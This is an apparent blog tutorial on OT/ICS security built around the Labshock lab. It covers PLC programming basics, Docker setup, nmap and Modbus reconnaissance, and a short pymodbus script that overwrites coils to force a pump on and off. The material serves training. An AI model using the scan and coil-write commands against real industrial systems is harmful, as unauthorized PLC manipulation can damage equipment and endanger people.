Automation Anatomy: Why OT Security Fails Without PLC Programming Fundamentals + Video

By /

Listen to this Post

Featured Image

Introduction:

Operational Technology (OT) security is fundamentally different from traditional IT security. While IT security professionals focus on networks, endpoints, and data, OT security requires deep understanding of physical processes, control logic, and the intricate chain of events that transforms a sensor reading into a physical action. Zakhar Bernhardt, Founder & CEO of Labshock Security and Architect at Primion, emphasizes a critical truth: most practitioners start from security and pentesting, but in OT this approach is insufficient because the Programmable Logic Controller (PLC) is only one part of a complex system where signals flow from physical processes through PLC memory, cyclic scans, HMI tags, and outputs that move real equipment. Before you can secure an industrial control system, you must first understand what you are controlling.

Learning Objectives:

  • Understand the complete automation anatomy and the role of each component in the OT chain
  • Master PLC programming fundamentals across Ladder Logic, Structured Text, and Function Blocks
  • Learn to set up a virtual OT security lab using Labshock for hands-on testing and validation

You Should Know:

1. Understanding the Automation Anatomy: The OT Chain

Before writing a single line of PLC logic, security professionals must comprehend the complete data flow that governs industrial processes. The automation anatomy consists of several interconnected layers: sensors capture physical process data, the PLC reads this data through its memory during a cyclic scan, logic executes and changes state, outputs drive physical equipment, the HMI displays results to operators, and the network carries all this traffic. Security teams typically only see the network traffic at the end of this chain, missing critical context about what happened before.

Step-by-Step Guide to Mapping an OT Environment:

  1. Identify Physical Processes: Document every sensor, actuator, motor, and valve in the facility. Understand what each device measures or controls.
  2. Map Data Flow: Trace how data moves from field devices to PLC inputs, through logic execution, to outputs and HMI displays.
  3. Analyze the PLC Scan Cycle: Understand that PLCs execute logic cyclically—reading inputs, executing code, and writing outputs in a continuous loop. This scan time directly impacts system behavior and security.
  4. Document Network Architecture: Identify all OT network segments, including fieldbus networks (e.g., Modbus, Profibus) and supervisory networks (e.g., Ethernet/IP).
  5. Create an Asset Inventory: List all PLCs, HMIs, engineering workstations, and network devices with their IP addresses, firmware versions, and communication protocols.

  6. Setting Up Your OT Security Lab with Labshock

Labshock is a free, Docker-based OT/ICS cybersecurity lab environment that mimics real industrial networks, allowing security professionals to analyze protocols, simulate attacks, and test defensive strategies in a secure virtualized setting. It provides a complete stack including PLC, SCADA/HMI, IDS, and pentest workstations.

Step-by-Step Installation Guide (Ubuntu/Docker):

 1. Install Docker on Ubuntu
!/bin/bash
set -e
 Uninstall old Docker versions
for pkg in docker.io docker-doc docker-compose docker-compose-v2 podman-docker containerd runc; do
sudo apt-get remove -y $pkg || true
done
 Prepare system for Docker repository
sudo apt-get update
sudo apt-get install -y ca-certificates curl gnupg lsb-release
 Add Docker's official GPG key
sudo install -m 0755 -d /etc/apt/keyrings
curl -fsSL https://download.docker.com/linux/ubuntu/gpg | sudo tee /etc/apt/keyrings/docker.asc > /dev/null
sudo chmod a+r /etc/apt/keyrings/docker.asc
 Add Docker repository
echo "deb [arch=$(dpkg --print-architecture) signed-by=/etc/apt/keyrings/docker.asc] https://download.docker.com/linux/ubuntu $(. /etc/os-release && echo "$VERSION_CODENAME") stable" | sudo tee /etc/apt/sources.list.d/docker.list > /dev/null
sudo apt-get update
sudo apt-get install -y docker-ce docker-ce-cli containerd.io docker-buildx-plugin docker-compose-plugin

 2. Clone and Launch Labshock
git clone https://github.com/zakharb/labshock.git
cd labshock/labshock
docker-compose build
docker-compose up -d

Access the Labshock Portal:

  • Portal: http://localhost — landing page and documentation
  • OpenPLC: http://localhost:8080 — credentials: openplc/openplc, IEC 61131-3 runtime
  • FUXA HMI: http://localhost:1881 — web-based SCADA/HMI interface
  • EWS (Kali): http://localhost:5911/vnc.html — engineering workstation with full IDE
  • Pentest Station: `ssh pentest@localhost -p 2222` (password: pentest) — Nmap, Metasploit, Modbus-tk
  • IDS (Snort): http://localhost:1443 — live OT protocol decoding

Network Topology:

  • L2 Network (192.168.2.0/24): Field layer with PLC traffic
  • L3 Network (192.168.3.0/24): Supervisory layer with SCADA, EWS, IDS, and Collector
  1. PLC Programming Fundamentals: Ladder Logic, Structured Text, and Function Blocks

PLC programming follows the IEC 61131-3 standard, which defines multiple languages: Ladder Diagram (LD), Function Block Diagram (FBD), and Structured Text (ST). Each language serves different purposes—Ladder Diagram resembles electrical schematics and is widely used in North America, Structured Text resembles Pascal or C and is common in Europe, while Function Block Diagram connects code blocks like wiring components.

“Hello World” Ladder Logic Program:

A basic “Hello World” in PLC programming typically involves controlling an output based on an input condition. Here’s how to create a simple start/stop circuit in Ladder Logic:

[ Start PB ]-[ Stop PB ]-( Motor Output )
| |
|-[ Motor ]-|

This rung implements a seal-in circuit where:

  • Pressing the Start pushbutton energizes the Motor output
  • The Motor contact seals (latches) the circuit, keeping the output energized
  • Pressing the Stop pushbutton breaks the circuit, de-energizing the output

Structured Text Equivalent:

IF Start_PB AND NOT Stop_PB THEN
Motor := TRUE;
ELSIF Stop_PB THEN
Motor := FALSE;
END_IF;

Function Block Diagram Example:

A Function Block for a simple timer might look like:

[ TON ] 
IN --> Motor_Running
PT --> 5s
Q --> Delay_Complete
ET --> Elapsed_Time

4. Reconnaissance and Network Mapping in OT Environments

Before any security testing, you must understand the network topology and identify all assets. Labshock provides a realistic environment for practicing OT reconnaissance.

Network Scanning Commands (from Pentest Station):

 ARP and Ping Sweep of Supervisory Network (L3)
sudo nmap -sn -PR 192.168.3.0/24 -oG l3.gnmap

 Sweep the Field Network (L2)
sudo nmap -sn -PR 192.168.2.0/24 -oG l2.gnmap

 Port Scan for Modbus (TCP/502) and other OT protocols
sudo nmap -p 502,44818,2222,8080,1881,1443,2443 192.168.2.0/24

Modbus Enumeration:

 Discover Modbus devices
nmap --script modbus-discover -p 502 192.168.2.0/24

Read Modbus coil values
modpoll -m tcp -a 1 -r 0 -c 10 192.168.2.10

5. Attacking and Defending PLCs: Practical Security Testing

The primary focus of OT security testing is attacking the PLC, which manages and controls process data, and the SCADA system, which presents this data in real time. By modifying data within the PLC, it is possible to affect operational processes.

Simulating a Modbus Attack (Python Script):

from pymodbus.client import ModbusTcpClient
import time

Connect to PLC
client = ModbusTcpClient('192.168.2.10', port=502)
client.connect()

Read current coil values
response = client.read_coils(0, 10)
print(f"Current coil values: {response.bits}")

Write malicious value to coil (e.g., override pump control)
client.write_coil(0, True)  Force pump ON
time.sleep(2)
client.write_coil(0, False)  Force pump OFF

client.close()

IDS Monitoring:

Labshock includes an IDS service that decodes OT protocols and generates alerts. Monitor IDS logs at http://localhost:1443 to see how attacks are detected.

Defensive Measures:

  • Network Segmentation: Isolate OT networks from IT networks
  • Modbus Security: Use Modbus with authentication or TLS where possible
  • PLC Hardening: Change default credentials, disable unused services, enable logging
  • Continuous Monitoring: Deploy OT-specific IDS/IPS to detect anomalous traffic patterns

6. The Convergence of Physical and OT Security

Zakhar Bernhardt draws a powerful parallel between physical security and OT security: “Physical security watches doors, access, movement. OT security watches PLCs, traffic, signals. Same goal: keep plant safe, keep operations running”. Yet these teams often operate in silos with no shared picture or alerts. Primion is working to bridge this gap by building converged security for European sites with real systems and real impact.

Why Convergence Matters:

  • Physical security breaches can lead to OT compromises (e.g., unauthorized physical access to control rooms)
  • OT attacks can have physical consequences (e.g., manipulated PLC logic causing equipment damage)
  • Unified monitoring provides complete situational awareness

Implementation Steps:

  1. Unify Security Teams: Create cross-functional teams covering both physical and OT security
  2. Share Alerts: Integrate physical access control systems with OT monitoring platforms
  3. Conduct Joint Exercises: Run tabletop exercises that simulate combined physical-OT attack scenarios
  4. Adopt Security by Design: Primion’s approach emphasizes encrypted communication, tamper-proof firmware, and regular updates

7. OT SIEM and Log Collection

Effective OT security requires collecting and analyzing logs from PLCs, HMIs, IDS, and other components. Labshock includes a Collector service that aggregates logs and packets.

Setting Up Log Collection:

 Access Collector UI
http://localhost:2443

Configure log forwarding to SIEM (e.g., Splunk)
 Labshock provides integration with Splunk for OT SIEM training

Key Logs to Collect:

  • PLC logic changes and program uploads/downloads
  • HMI user login attempts and tag modifications
  • IDS alerts for suspicious protocol anomalies
  • Network device syslogs and authentication events

OT SIEM Use Cases:

  • Unauthorized PLC program modifications
  • Repeated failed login attempts to HMIs or engineering workstations
  • Abnormal Modbus read/write patterns
  • Communication with unknown IP addresses

What Undercode Say:

  • Key Takeaway 1: OT security is fundamentally about understanding physical processes and control logic, not just network traffic. Without PLC programming knowledge, security testing is incomplete and potentially dangerous.

  • Key Takeaway 2: Hands-on practice in realistic environments like Labshock is essential for developing OT security skills. You cannot secure what you do not understand, and you cannot validate security through documentation alone—you must run, break, fix, and validate systems in controlled settings.

Analysis:

The OT security landscape is rapidly evolving as industrial systems become increasingly connected. Traditional IT security approaches are insufficient because they lack context about physical processes and control behavior. Zakhar Bernhardt’s emphasis on “automation anatomy” highlights a critical gap in current OT security training: most programs focus on pentesting tools and network analysis without teaching the fundamentals of how industrial systems actually work. The Labshock platform addresses this by providing a complete, free, hands-on environment where practitioners can learn both PLC programming and security testing in a realistic context. The convergence of physical and OT security, as championed by Primion, represents the next frontier—recognizing that physical breaches can enable OT attacks and that unified visibility is essential for comprehensive protection. As IoT devices proliferate in industrial environments, the attack surface expands dramatically, making Security by Design principles more critical than ever.

Prediction:

+1 The democratization of OT security training through platforms like Labshock will significantly reduce the skills gap in industrial cybersecurity over the next 3-5 years, enabling more organizations to build competent internal security teams.

+1 The convergence of physical and OT security will become a standard practice in critical infrastructure, driven by regulatory requirements and the recognition that siloed security approaches are no longer viable.

-1 The proliferation of IoT devices in OT environments will continue to expand the attack surface faster than security measures can adapt, leading to an increase in successful attacks against industrial systems in the short term.

+1 AI-powered OT security analytics will mature, enabling real-time anomaly detection and automated response to threats, but will require substantial investment in data collection and model training.

-1 Organizations that fail to invest in hands-on OT security training and testing will remain vulnerable to sophisticated attacks that exploit control logic vulnerabilities, not just network misconfigurations.

▶️ Related Video (88% Match):

🎯Let’s Practice For Free:

🎓 Live Courses & Certifications:

Join Undercode Academy for Verified Certifications

🚀 Request a Custom Project:

Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands

IT/Security Reporter URL:

Reported By: Zakharb Labshock – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow UndercodeTesting & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin | 🦋BlueSky

Related Posts: